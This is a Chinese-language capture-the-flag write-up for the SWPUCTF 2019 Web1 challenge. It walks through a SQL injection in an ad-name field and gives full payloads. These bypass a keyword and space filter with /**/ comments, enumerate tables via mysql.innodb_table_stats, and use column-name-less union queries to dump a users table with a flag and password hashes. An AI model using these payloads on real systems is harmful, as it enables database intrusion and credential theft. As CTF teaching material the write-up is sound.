📕 WriteUp
Search
K
Comment on page

SWPUCTF 2019

Web

Web1

注册账号并登陆后能够 申请发布广告 ,在广告申请中的广告名输入
-1' order by 1#
回显 标题含有敏感词汇 ,通过测试可以发现 orand空格join
先判断列数,通过逐步判断直到
-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
可以得到回显如下图
可以得出字段有 22 列,并且 2 和 3 是可以进行注入攻击的。
通过构造 Payload 如下
-1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
可以得出数据库名为 Web1 ,但是由于 or 被过滤了,所以也需要绕过 information_schema 库。
通过构造 Payload 如下
-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/
sys.schema_table_statistics_with_buffer/**/where/**/table_schema=Web1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
得到回显 Table 'sys.schema_table_statistics_with_buffer' doesn't exist ,那就得换另一种方法力,通过构造 Payload 如下
-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
得到所有表名 ads, users ,尝试无列名注入。
https://zhuanlan.zhihu.com/p/98206699
通过构造 Payload 如下
-1'/**/union/**/select/**/1,(select/**/group_concat(a.1)/**/from/**/(select/**/1/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
-1'/**/union/**/select/**/1,(select/**/group_concat(a.1)/**/from/**/(select/**/1,2/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
得到回显 The used SELECT statements have a different number of columns ,直到如下 Payload
-1'/**/union/**/select/**/1,(select/**/group_concat(a.1)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
得到回显 1,1,2,3 ,那就继续查看第二列,构造 Payload 如下
-1'/**/union/**/select/**/1,(select/**/group_concat(a.2)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
得到回显 2,flag,admin,1 ,看到 flag 了,那就继续康康第三列,构造 Payload 如下
-1'/**/union/**/select/**/1,(select/**/group_concat(a.3)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
得到回显如下
3,flag{81dda3bd-2651-4353-8d11-53c5c3842ec5},53e217ad4c721eb9565cf25a5ec3b66e,c4ca4238a0b923820dcc509a6f75849b
就得到 flag 了。